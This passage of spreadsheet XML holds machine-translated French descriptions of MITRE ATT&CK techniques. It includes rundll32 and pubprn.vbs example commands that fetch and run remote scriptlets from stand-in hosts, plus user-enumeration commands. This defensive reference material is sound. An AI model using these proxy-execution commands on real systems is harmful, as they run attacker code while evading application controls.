Un adversaire peut également être en mesure d’élever ses privilèges, car certains scripts d’initialisation de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés.
https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de se positionner entre deux ou plusieurs appareils en réseau à l’aide d’une technique AiTM (Adversary-in-the-Middle) pour soutenir des comportements ultérieurs tels que [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) ou les attaques par rejeu ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). En abusant des fonctionnalités des protocoles réseau courants qui peuvent déterminer le flux du trafic réseau (par exemple, ARP, DNS, LLMNR, etc.), les adversaires peuvent forcer un appareil à communiquer par le biais d’un système contrôlé par l’adversaire afin de collecter des informations ou d’effectuer des actions supplémentaires. (Citation : Rapid7 MiTM Basics)
Par exemple, les adversaires peuvent manipuler les paramètres DNS de la victime pour permettre d’autres activités malveillantes, telles que l’empêchement/la redirection des utilisateurs pour qu’ils accèdent à des sites légitimes et/ou la diffusion de logiciels malveillants supplémentaires. (Référence : ttint_rat)(Référence : dns_changer_trojans)(Référence : ad_blocker_with_miner) Les adversaires peuvent également manipuler le DNS et exploiter leur position afin d’intercepter les informations d’identification des utilisateurs, y compris les jetons d’accès ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) et les cookies de session ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)). (Référence : volexity_0day_sophos_FW)(Citation : Tactiques symboliques) [Attaque de rétrogradation]Les (https://attack.mitre.org/techniques/T1562/010)s peuvent également être utilisés pour établir une position AiTM, par exemple en négociant une version moins sécurisée, obsolète ou plus faible du protocole de communication (SSL/TLS) ou de l’algorithme de chiffrement. (Référence : mitm_tls_downgrade_att)(Référence : taxonomy_downgrade_att_tls)(Référence : tlseminar_downgrade_att)
Les adversaires peuvent également tirer parti de la position AiTM pour tenter de surveiller et/ou de modifier le trafic, comme dans [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002). Les adversaires peuvent configurer une position similaire à AiTM pour empêcher le trafic de circuler vers la destination appropriée, potentiellement vers [Entraver les défenses](https://attack.mitre.org/techniques/T1562) et/ou à l’appui d’un [Déni de service du réseau](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’identifier l’utilisateur principal, l’utilisateur actuellement connecté, l’ensemble d’utilisateurs qui utilisent couramment un système ou si un utilisateur utilise activement le système. Ils peuvent le faire, par exemple, en récupérant les noms d’utilisateur des comptes ou en utilisant [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Les informations peuvent être collectées de différentes manières à l’aide d’autres techniques de découverte, car les détails de l’utilisateur et du nom d’utilisateur sont répandus dans l’ensemble d’un système et incluent la propriété du processus en cours d’exécution, la propriété des fichiers/répertoires, les informations de session et les journaux système. Les adversaires peuvent utiliser les informations de [Découverte du propriétaire du système/de l’utilisateur](https://attack.mitre.org/techniques/T1033) lors de la découverte automatique pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Divers utilitaires et commandes peuvent acquérir ces informations, y compris &lt;code&gt;whoami&lt;/code&gt;. Sous macOS et Linux, l’utilisateur actuellement connecté peut être identifié par &lt;code&gt;w&lt;/code&gt; et &lt;code&gt;who&lt;/code&gt;. Sur macOS, la commande &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; peut également être utilisée pour énumérer les comptes d’utilisateurs. Les variables &lt;code&gt;d’environnement, telles que %USERNAME %&lt;/code&gt; et &lt;code&gt;$USER&lt;/code&gt;, peuvent également être utilisées pour accéder à ces informations.
Sur les périphériques réseau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show users' et 'show ssh' peuvent être utilisées pour afficher les utilisateurs actuellement connectés au périphérique. (Référence : show_ssh_users_cmd_cisco)(Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)
https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer, louer ou obtenir une infrastructure qui peut être utilisée pendant le ciblage. Il existe une grande variété d’infrastructures pour héberger et orchestrer les opérations de l’adversaire. Les solutions d’infrastructure comprennent des serveurs physiques ou cloud, des domaines et des services Web tiers. (Citation : TrendmicroHideoutsLease) Certains fournisseurs d’infrastructure offrent des périodes d’essai gratuites, ce qui permet d’acquérir des infrastructures à un coût limité ou gratuit. (Citation : Essai gratuit PurpleUrchin) De plus, les botnets sont disponibles à la location ou à l’achat.
L’utilisation de ces solutions d’infrastructure permet aux adversaires de mettre en scène, de lancer et d’exécuter des opérations. Les solutions peuvent aider les opérations de l’adversaire à se fondre dans le trafic considéré comme normal, par exemple en contactant des services Web tiers ou en acquérant une infrastructure pour prendre en charge [Proxy](https://attack.mitre.org/techniques/T1090), y compris à partir de services proxy résidentiels. (Référence : amnesty_nso_pegasus)(Citation : Bourrage d’identifiants par procuration par le FBI)(Référence : Mandiant APT29 Microsoft 365 2022) En fonction de la mise en œuvre, les adversaires peuvent utiliser une infrastructure qui rend difficile la connexion physique à eux, ainsi qu’une infrastructure qui peut être rapidement provisionnée, modifiée et arrêtée.
https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant rundll32.exe à proxy . L’utilisation de rundll32.exe, au lieu de l’exécution directe (c’est-à-dire [Modules partagés](https://attack.mitre.org/techniques/T1129)), peut éviter de déclencher des outils de sécurité qui peuvent ne pas surveiller l’exécution du processus rundll32.exe en raison de listes d’autorisation ou de faux positifs provenant d’opérations normales. Rundll32.exe est généralement associé à l’exécution de charges utiles DLL (ex : &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe peut également être utilisé pour exécuter des fichiers d’éléments (.cpl) [Panneau de configuration](https://attack.mitre.org/techniques/T1218/002) via les fonctions shell32.dll non documentées &lt;code&gt;Control_RunDLL&lt;/code&gt; et &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-cliquer sur un fichier .cpl entraîne également l’exécution de rundll32.exe. (Citation : Trend Micro CPL) Par exemple, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) peut être envoyé par proxy via Rundll32.exe.
Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript. Cela peut être fait en utilisant une syntaxe similaire à celle-ci : &lt;code&gt;rundll32.exe javascript :"\.. \mshtml,RunHTMLApplication " ; document.write() ; GetObject("script :https[ :]//www[.]exemple[.]com/malicious.sct ») »&lt;/code&gt; Ce comportement a été observé utilisé par des logiciels malveillants tels que Poweliks. (Citation : Il s’agit d’une confusion de ligne de commande de sécurité)
Les adversaires peuvent également tenter de masquer le code malveillant de l’analyse en abusant de la manière dont rundll32.exe charge les noms de fonction DLL. Dans le cadre de la prise en charge de la compatibilité Windows pour divers jeux de caractères, rundll32.exe vérifierons d’abord les fonctions larges/Unicode puis les fonctions prises en charge par les caractères ANSI avant de charger la fonction spécifiée (par exemple, étant donné la commande &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction,&lt;/code&gt; rundll32.exe tenteriez d’abord d’exécuter &lt;code&gt;ExampleFunctionW&lt;/code&gt;, ou à défaut de cette &lt;code&gt;ExampleFunctionA&lt;/code&gt;, avant de charger &lt;code&gt;ExampleFunction&lt;/code&gt;). Les adversaires peuvent donc masquer le code malveillant en créant plusieurs noms de fonctions exportés identiques et en ajoutant &lt;code&gt;W&lt;/code&gt; et/ou &lt;code&gt;A&lt;/code&gt; à des noms inoffensifs. (Citation : Attaquer Rundll32.exe obscurité)(Citation : github noRunDll) Les fonctions DLL peuvent également être exportées et exécutées par un numéro ordinal (ex : &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
De plus, les adversaires peuvent utiliser des techniques de masquage(https://attack.mitre.org/techniques/T1036) (telles que la modification des noms de fichiers DLL, des extensions de fichiers ou des noms de fonctions) pour dissimuler davantage l’exécution d’une charge utile malveillante. (Citation : rundll32.exe évasion de la défense)
https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir des conteneurs et d’autres ressources disponibles dans un environnement de conteneurs. D’autres ressources peuvent inclure des images, des déploiements, des pods, des nœuds et d’autres informations telles que l’état d’un cluster.
Ces ressources peuvent être consultées dans des applications web telles que le tableau de bord Kubernetes ou peuvent être interrogées via les API Docker et Kubernetes. (Citation : API Docker)(Citation : API Kubernetes) Dans Docker, les journaux peuvent divulguer des informations sur l’environnement, telles que la configuration de l’environnement, les services disponibles et le fournisseur de cloud que la victime peut utiliser. La découverte de ces ressources peut éclairer les prochaines étapes d’un adversaire dans l’environnement, telles que la façon d’effectuer un mouvement latéral et les méthodes d’exécution à utiliser.
https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter et configurer une infrastructure cloud sans serveur, telle que Cloudflare Workers, des fonctions AWS Lambda ou des scripts Google Apps, qui peuvent être utilisées lors du ciblage. En utilisant une infrastructure sans serveur, les adversaires peuvent rendre plus difficile l’attribution de l’infrastructure utilisée pendant les opérations.
Une fois acquis,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https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent coder les données à l’aide d’un système de codage de données standard pour rendre le contenu du trafic de commande et de contrôle plus difficile à détecter. Les informations de commande et de contrôle (C2) peuvent être codées à l’aide d’un système de codage de données standard qui adhère aux spécifications de protocole existantes. Les schémas de codage de données courants incluent ASCII, Unicode, hexadécimal, Base64 et MIME. (Citation : Wikipédia Binary-to-text Encoding)(citation : Codage des caractères de Wikipédia) Certains systèmes d’encodage de données peuvent également entraîner une compression de données, tels que gzip.
https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent intégrer des charges utiles dans d’autres fichiers pour dissimuler le contenu malveillant aux défenses. Sinon, des fichiers apparemment inoffensifs (tels que des scripts et des exécutables) peuvent être utilisés à mauvais escient pour transporter et obscurcir des charges utiles et du contenu malveillants. Dans certains cas, les charges utiles intégrées peuvent également permettre aux adversaires de [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) sans affecter les contrôles d’exécution tels que les signatures numériques et les tickets de notarisation. (Citation : Laboratoires Sentinelle) 
Les adversaires peuvent intégrer des charges utiles dans différents formats de fichier pour masquer les charges utiles. (Citation : Microsoft Learn) Ceci est similaire à la [Steganographie](https://attack.mitre.org/techniques/T1027/003), mais n’implique pas de tisser du contenu malveillant en octets et motifs spécifiques liés à des formats de médias numériques légitimes. (Citation : GitHub PSImage) 
Par exemple, des adversaires ont été observés en train d’intégrer des charges utiles dans un binaire autrement bénin ou en tant que superposition de celui-ci. (Citation : securelist dtrack2) Des adversaires ont également été observés en train d’imbriquer des charges utiles (telles que des exécutables et des scripts d’exécution seule) dans un fichier du même format. (Citation : SentinelLabs inversant les applescripts en run-only 2021) 
Le contenu intégré peut également être utilisé comme charges utiles [Injection de processus](https://attack.mitre.org/techniques/T1055) utilisées pour infecter des processus système inoffensifs. (Citation : Trend Micro) Ces charges utiles intégrées puis injectées peuvent être utilisées dans le cadre de modules de logiciels malveillants conçus pour fournir des fonctionnalités spécifiques telles que le chiffrement des communications C2 à l’appui d’un module d’orchestration. Par exemple, un module embarqué peut être injecté dans les navigateurs par défaut, permettant aux adversaires de communiquer ensuite via le réseau. (Citation : Rapport d’analyse des logiciels malveillants ComRAT)
https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les modules d’authentification enfichables (PAM) pour accéder aux informations d’identification de l’utilisateur ou permettre un accès injustifié aux comptes. PAM est un système modulaire de fichiers de configuration, de bibliothèques et de fichiers exécutables qui guident l’authentification pour de nombreux services. Le module d’authentification le plus courant est &lt;code&gt;pam_unix.so&lt;/code&gt;, qui récupère, définit et vérifie les informations d’authentification de compte dans &lt;code&gt;/etc/passwd&lt;/code&gt; et &lt;code&gt;/etc/shadow&lt;/code&gt;. (Citation : Apple PAM)(Citation : Man Pam_Unix)(Citation : Red Hat PAM)
Les adversaires peuvent modifier des composants du système PAM pour créer des portes dérobées. Les composants PAM, tels que &lt;code&gt;pam_unix.so&lt;/code&gt;, peuvent être corrigés pour accepter des valeurs arbitraires fournies par l’adversaire comme informations d’identification légitimes. (Citation : PAM Backdoor)
Les modifications malveillantes apportées au système PAM peuvent également être utilisées de manière abusive pour voler des informations d’identification. Les adversaires peuvent infecter les ressources PAM avec du code pour collecter les informations d’identification de l’utilisateur, car les valeurs échangées avec les composants PAM peuvent être en texte brut puisque PAM ne stocke pas les mots de passe. (Citation : PAM Creds)(Citation : Apple PAM)
https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>Un adversaire peut annuler les modifications apportées à une instance cloud après avoir effectué des activités malveillantes dans le but d’échapper à la détection et de supprimer les preuves de sa présence. Dans les environnements hautement virtualisés, tels que les infrastructures basées sur le cloud, cela peut être accompli en restaurant des instantanés de machine virtuelle (VM) ou de stockage de données via le tableau de bord de gestion du cloud ou des API cloud.
Une autre variante de cette technique consiste à utiliser un stockage temporaire attaché à l’instance de calcul. La plupart des fournisseurs de cloud proposent différents types de stockage, notamment persistant, local et/ou éphémère, les types éphémères étant souvent réinitialisés lors de l’arrêt/redémarrage de la machine virtuelle. (Citation : Tech Republic - Restaurer les instantanés AWS)(Citation : Google - Restaurer l’instantané du cloud)
https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les hôtes de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les hôtes peuvent inclure une variété de détails, y compris des données administratives (par exemple, nom, adresse IP attribuée, fonctionnalité, etc.) ainsi que des détails concernant sa configuration (par exemple : système d’exploitation, langue, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un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hôtes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Les adversaires peuvent également collecter des informations sur l’hôte de la victime via des en-têtes HTTP User-Agent, qui sont envoyés à un serveur pour identifier l’application, le système d’exploitation, le fournisseur et/ou la version de l’agent utilisateur demandeur. Cela peut être utilisé pour éclairer l’action de suivi de l’adversaire. Par exemple, les adversaires peuvent vérifier les agents utilisateurs pour le système d’exploitation demandeur, puis ne diffuser des logiciels malveillants que pour les systèmes d’exploitation cibles tout en ignorant les autres. (Citation : TrellixQakbot)
https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données de certificat numérique publiques pour obtenir des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les certificats numériques sont émis par une autorité de certification (CA) afin de vérifier cryptographiquement l’origine du contenu signé. Ces certificats, tels que ceux utilisés pour le trafic Web chiffré (communications HTTPS SSL/TLS), contiennent des informations sur l’organisation enregistrée, telles que le nom et l’emplacement.
Les adversaires peuvent rechercher des données de certificat numérique pour recueillir des informations exploitables. Les auteurs de menace peuvent utiliser des ressources en ligne et des outils de recherche pour recueillir des informations sur les certificats. (Citation : SSLShopper Lookup) Les données de certificat numérique peuvent également être disponibles à partir d’artefacts signés par l’organisation (par exemple, les certificats utilisés à partir du trafic Web chiffré sont servis avec du contenu). (Citation : Certificat SSL moyen) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer les frappes au clavier de l’utilisateur pour intercepter les informations d’identification au fur et à mesure que l’utilisateur les saisit. L’enregistrement de frappe est susceptible d’être utilisé pour acquérir des informations d’identification pour de nouvelles opportunités d’accès lorsque les efforts de [déchargement des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) ne sont pas efficaces et peuvent nécessiter qu’un adversaire intercepte les frappes au clavier sur un système pendant une période de temps importante avant que les informations d’identification ne puissent être capturées avec succès. Afin d’augmenter la probabilité de capturer rapidement les informations d’identification, un adversaire peut également effectuer des actions telles que l’effacement des cookies du navigateur pour forcer les utilisateurs à se réauthentifier auprès des systèmes. (Référence : Talos Kimsuky, novembre 2021)
L’enregistrement de frappe est le type de capture d’entrée le plus répandu, avec de nombreuses façons différentes d’intercepter les frappes au clavier. (Citation : Aventures d’une frappe) Certaines méthodes incluent :
* Callbacks de l’API de raccordement utilisés pour le traitement des frappes au clavier. Contrairement à [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), il se concentre uniquement sur les fonctions API destinées au traitement des données de frappe.
* Lecture des données brutes de frappe à partir de la mémoire tampon matérielle.
* Modifications du registre Windows.
* Pilotes personnalisés.
* [Modifier l’image système](https://attack.mitre.org/techniques/T1601) peut fournir aux adversaires des crochets dans le système d’exploitation des périphériques réseau pour lire les frappes brutes des sessions de connexion. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de masquer leurs artefacts basés sur des fichiers en les écrivant dans des dossiers spécifiques ou des noms de fichiers exclus de l’analyse antivirus (AV) et d’autres fonctionnalités défensives. Les scanners antivirus et autres analyseurs basés sur des fichiers incluent souvent des exclusions pour optimiser les performances et faciliter l’installation et l’utilisation légitime des applications. Ces exclusions peuvent être contextuelles (par exemple, les analyses ne sont lancées qu’en réponse à des événements/alertes déclencheurs spécifiques), mais sont aussi souvent des chaînes codées en dur faisant référence à des dossiers et/ou des fichiers spécifiques supposés fiables et légitimes. (Citation : Exclusions de dossiers de fichiers Microsoft)
Les adversaires peuvent abuser de ces exclusions pour masquer leurs artefacts basés sur des fichiers. Par exemple, plutôt que de modifier les paramètres de l’outil pour ajouter une nouvelle exclusion (par exemple, [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001)), les adversaires peuvent supprimer leurs charges utiles basées sur des fichiers dans des exclusions par défaut ou autrement bien connues. Les adversaires peuvent également utiliser [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) et d’autres activités [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) pour découvrir et vérifier les exclusions existantes dans un environnement victime.
https://attack.mitre.org/techniques/T1564/012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</si>
  <si>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La plupart des plates-formes Linux et basées sur Linux fournissent un ensemble standard de groupes d’autorisations (utilisateur, groupe et autres) et un ensemble standard d’autorisations (lecture, écriture et exécution) qui sont appliqués à chaque groupe. Bien que les nuances de l’implémentation des autorisations de chaque plate-forme puissent varier, la plupart des plates-formes fournissent deux commandes principales utilisées pour manipuler les ACL de fichiers et de répertoires : &lt;code&gt;chown&lt;/code&gt; (abréviation de change owner) et &lt;code&gt;chmod&lt;/code&gt; (abréviation de change mode).
Adversarial peut utiliser ces commandes pour se faire propriétaire de fichiers et de répertoires ou changer de mode si les autorisations actuelles le permettent. Ils pourraient par la suite empêcher d’autres personnes d’accéder au fichier. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). (Citation : 20 outils et techniques courants macOS)
https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>Les adversaires qui n’ont aucune connaissance préalable des informations d’identification légitimes au sein du système ou de l’environnement peuvent deviner des mots de passe pour tenter d’accéder aux comptes. Sans connaître le mot de passe d’un compte, un adversaire peut choisir de deviner systématiquement le mot de passe à l’aide d’un mécanisme répétitif ou itératif. Un adversaire peut deviner les identifiants de connexion sans connaître au préalable les mots de passe du système ou de l’environnement au cours d’une opération à l’aide d’une liste de mots de passe courants. La supposition de mot de passe peut ou non prendre en compte les politiques de la cible en matière de complexité des mots de passe ou utiliser des stratégies qui peuvent verrouiller les comptes après un certain nombre de tentatives infructueuses.
Deviner les mots de passe peut être une option risquée, car elle peut entraîner de nombreux échecs d’authentification et de verrouillage de compte, en fonction des politiques d’échec de connexion de l’organisation. (Référence : Cylance Cleaver)
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés pour deviner les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 SNMP (161/UDP et 162/TCP/UDP)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De plus, les adversaires peuvent abuser des interfaces de périphériques réseau (telles que « wlanAPI ») pour forcer par force brute le(s) routeur(s) wifi(s) accessible(s) via des protocoles d’authentification sans fil. (Citation : Trend Micro Emotet 2020)
Dans les environnements par défaut, les tentatives de connexion LDAP et Kerberos sont moins susceptibles de déclencher des événements via SMB, ce qui crée l’événement d'« échec de connexion » Windows ID 4625.
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser PubPrn pour l’exécution par proxy de fichiers distants malveillants. PubPrn.vbs est un script [Visual Basic](https://attack.mitre.org/techniques/T1059/005) qui publie une imprimante dans les services de domaine Active Directory. Le script peut être signé par Microsoft et est généralement exécuté via le [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. Par exemple, le code suivant publie une imprimante dans le domaine spécifié : &lt;code&gt;cscript pubprn Printer1 LDAP ://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;. (Citation : pubprn)
Les adversaires peuvent abuser de PubPrn pour exécuter des charges utiles malveillantes hébergées sur des sites distants. (Citation : Enigma0x3 PubPrn Bypass) Pour ce faire, les adversaires peuvent définir le deuxième &lt;code&gt;paramètre script :&lt;/code&gt; pour référencer un fichier scriptlet (.sct) hébergé sur un site distant. Un exemple de commande est &lt;code&gt;pubprn.vbs 127.0.0.1 script :https ://mydomain.com/folder/file.sct&lt;/code&gt;. Ce comportement peut contourner les restrictions de validation de signature et les solutions de contrôle d’application qui ne tiennent pas compte de l’utilisation abusive de ce script.
Dans les versions ultérieures de Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; a été mis à jour pour empêcher l’exécution de proxy à partir d’un site distant. Cela se fait en limitant le protocole spécifié dans le deuxième paramètre à &lt;code&gt;LDAP://&lt;/code&gt;, au lieu du moniker &lt;code&gt;script :&lt;/code&gt; qui pourrait être utilisé pour référencer du code distant via HTTP(S).
https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des informations techniques sur les victimes qui peuvent être utilisées lors du ciblage. Les informations sur les victimes peuvent être disponibles à l’achat dans des sources et des bases de données privées réputées, telles que des abonnements payants à des flux de bases de données d’analyse ou à d’autres services d’agrégation de données. Les adversaires peuvent également acheter des informations auprès de sources moins fiables, telles que le dark web ou les marchés noirs de la cybercriminalité.
Les adversaires peuvent acheter des informations sur leurs cibles déjà identifiées ou utiliser des données achetées pour découvrir des opportunités de violations réussies. Les auteurs de menace peuvent recueillir divers détails techniques à partir des données achetées, y compris, mais sans s’y limiter, les coordonnées des employés, les informations d’identification ou des détails concernant l’infrastructure d’une victime. (Citation : Données de vente ZDNET)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https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de vider les informations d’identification pour obtenir des informations d’identification et de connexion au compte, généralement sous la forme d’un hachage ou d’un mot de passe en texte clair. Les informations d’identification peuvent être obtenues à partir des caches, de la mémoire ou des structures du système d’exploitation. (Citation : Brining MimiKatz à Unix) Les informations d’identification peuvent ensuite être utilisées pour effectuer [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) et accéder à des informations restreintes.
Plusieurs des outils mentionnés dans les sous-techniques associées peuvent être utilisés à la fois par des adversaires et des testeurs de sécurité professionnels. D’autres outils personnalisés existent probablement aussi.
https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des charges utiles malveillantes en chargeant des modules partagés. Les modules partagés sont des fichiers exécutables qui sont chargés dans des processus pour fournir un accès à du code réutilisable, tel que des fonctions personnalisées spécifiques ou l’appel de fonctions API du système d’exploitation (c’est-à-dire, [API native](https://attack.mitre.org/techniques/T1106)).
Les adversaires peuvent utiliser cette fonctionnalité comme un moyen d’exécuter des charges utiles arbitraires sur un système victime. Par exemple, les adversaires peuvent modulariser les fonctionnalités de leurs logiciels malveillants en objets partagés qui exécutent diverses fonctions telles que la gestion des communications réseau C2 ou l’exécution d’actions spécifiques sur objectif.
Le chargeur de modules Linux et macOS peut charger et exécuter des objets partagés à partir de chemins locaux arbitraires. Cette fonctionnalité réside dans 'dlfcn.h' dans des fonctions telles que 'dlopen' et 'dlsym'. Bien que macOS puisse exécuter des fichiers « .so », la pratique courante utilise des fichiers « .dylib ». (Citation : Apple Dev Dynamic Libraries)(Citation : Bibliothèques partagées Linux)(Citation : RotaJakiro 2021 analyse netlab360)(Citation : Unit42 OceanLotus 2017)
Le chargeur de module Windows peut recevoir l’instruction de charger des DLL à partir de chemins locaux arbitraires et de chemins réseau UNC (Universal Naming Convention) arbitraires. Cette fonctionnalité réside dans 'NTDLL.dll' et fait partie de l'[API native](https://attack.mitre.org/techniques/T1106) de Windows qui est appelée à partir de fonctions telles que 'LoadLibrary' au moment de l’exécution. (Citation : Microsoft DLL)
https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des données relatives aux appareils gérés à partir de référentiels de configuration. Les référentiels de configuration sont utilisés par les systèmes de gestion pour configurer, gérer et contrôler les données sur des systèmes distants. Les référentiels de configuration peuvent également faciliter l’accès à distance et l’administration des appareils.
Les adversaires peuvent cibler ces référentiels afin de collecter de grandes quantités de données sensibles d’administration système. Les données des référentiels de configuration peuvent être exposées par divers protocoles et logiciels et peuvent stocker une grande variété de données, dont une grande partie peut s’aligner sur les objectifs de découverte de l’adversaire. (Référence : US-CERT-TA18-106A)(Référence : US-CERT TA17-156A SNMP Abuse 2017)
https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Les adversaires peuvent corrompre ou effacer les structures de données du disque dur d’un disque dur nécessaire au démarrage d’un système ; Cibler des systèmes critiques spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. 
Les adversaires peuvent tenter de rendre le système incapable de démarrer en écrasant les données critiques situées dans des structures telles que l’enregistrement de démarrage principal (MBR) ou la table de partition. (Référence : Symantec Shamoon 2012)(Citation : FireEye Shamoon novembre 2016)(Citation : Palo Alto Shamoon, novembre 2016)(Citation : Kaspersky StoneDrill 2017)(Citation : Unité 42 Shamoon3 2018) Les données contenues dans les structures de disque peuvent inclure le code exécutable initial pour le chargement d’un système d’exploitation ou l’emplacement des partitions du système de fichiers sur le disque. Si ces informations ne sont pas présentes, l’ordinateur ne sera pas en mesure de charger un système d’exploitation pendant le processus de démarrage, laissant l’ordinateur indisponible. [Effacement de la structure du disque](https://attack.mitre.org/techniques/T1561/002) peut être effectué de manière isolée ou en même temps que [Effacement du contenu du disque](https://attack.mitre.org/techniques/T1561/001) si tous les secteurs d’un disque sont effacés.
Sur les périphériques réseau, les adversaires peuvent reformater le système de fichiers à l’aide des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'format'. (Référence : format_cmd_cisco)
Pour maximiser l’impact sur l’organisation cible, les programmes malveillants conçus pour détruire les structures de disque peuvent avoir des fonctionnalités de type ver pour se propager sur un réseau en exploitant d’autres techniques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
https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de provoquer un déni de service (DoS) en envoyant directement un volume élevé de trafic réseau à une cible. Cette attaque DoS peut également réduire la disponibilité et la fonctionnalité du ou des systèmes et du réseau ciblés. [Inondation directe du réseau]Les (https://attack.mitre.org/techniques/T1498/001) sont lorsqu’un ou plusieurs systèmes sont utilisés pour envoyer un volume élevé de paquets réseau vers le réseau du service ciblé. Presque tous les protocoles réseau peuvent être utilisés pour l’inondation. Les protocoles sans état tels que UDP ou ICMP sont couramment utilisés, mais les protocoles avec état tels que TCP peuvent également être utilisés.
Les botnets sont couramment utilisés pour mener des attaques d’inondation de réseau contre les réseaux et les services. Les botnets de grande taille peuvent générer une quantité importante de trafic à partir de systèmes répartis sur l’Internet mondial. Les adversaires peuvent disposer des ressources nécessaires pour développer et contrôler leur propre infrastructure de botnet ou louer du temps sur un botnet existant pour mener une attaque. Dans certains des pires cas de DoS distribué (DDoS), tant de systèmes sont utilisés pour générer le flood que chacun n’a besoin d’envoyer qu’une petite quantité de trafic pour produire un volume suffisant pour saturer le réseau cible. Dans de telles circonstances, il devient extrêmement difficile de distinguer le trafic DDoS des clients légitimes. Les botnets ont été utilisés dans certaines des attaques DDoS flooding les plus médiatisées, telles que la série d’incidents de 2012 qui ont ciblé de grandes banques américaines. (Citation : USNYAG IranianBotnet mars 2016)
https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les variables d’environnement utilisées pour charger les bibliothèques. La variable d’environnement PATH contient une liste de répertoires (Utilisateur et Système) que le système d’exploitation parcourt séquentiellement à la recherche du binaire appelé à partir d’un script ou de la ligne de commande. 
Les adversaires peuvent placer un programme malveillant dans une entrée antérieure de la liste des répertoires stockés dans la variable d’environnement PATH, ce qui fait que le système d’exploitation exécute le binaire malveillant plutôt que le binaire légitime lorsqu’il effectue une recherche séquentielle dans cette liste PATH.
